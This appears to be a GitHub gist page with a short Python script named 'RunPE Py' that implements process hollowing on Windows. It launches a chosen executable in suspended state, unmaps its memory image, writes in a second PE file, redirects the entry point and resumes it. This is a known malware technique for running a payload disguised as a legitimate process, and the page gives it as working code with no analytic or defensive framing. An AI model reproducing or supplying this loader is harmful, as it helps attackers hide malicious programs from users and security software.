Created
December 15, 2015 20:41
-
-
Save toufik-airane/034167792e8d1b044273 to your computer and use it in GitHub Desktop.
RunPE Py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import pefile | |
from ctypes import * | |
from winappdbg import * | |
CREATE_SUSPENDED = 0x4 | |
def RunPE(): | |
gFile, eFile = sys.argv[1], sys.argv[2] | |
hHandle = win32.kernel32.CreateProcess(gFile, dwCreationFlags=CREATE_SUSPENDED) | |
hProcess = Process(hHandle.dwProcessId) | |
hThread = Thread(hHandle.dwThreadId) | |
hPeb = hProcess.get_peb() | |
pe = pefile.PE(eFile) | |
data = pe.get_memory_mapped_image() | |
szdata = len(data) | |
windll.ntdll.NtUnmapViewOfSection(hHandle.hProcess, hPeb.ImageBaseAddress) | |
win32.kernel32.VirtualAllocEx(hHandle.hProcess, hPeb.ImageBaseAddress, szdata) | |
win32.kernel32.WriteProcessMemory(hHandle.hProcess, hPeb.ImageBaseAddress, data) | |
hThread.set_register("Eax", pe.OPTIONAL_HEADER.ImageBase + pe.OPTIONAL_HEADER.AddressOfEntryPoint) | |
raw_input("pause ...") | |
hThread.resume() | |
if __name__ == "__main__": | |
System.request_debug_privileges() | |
RunPE() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment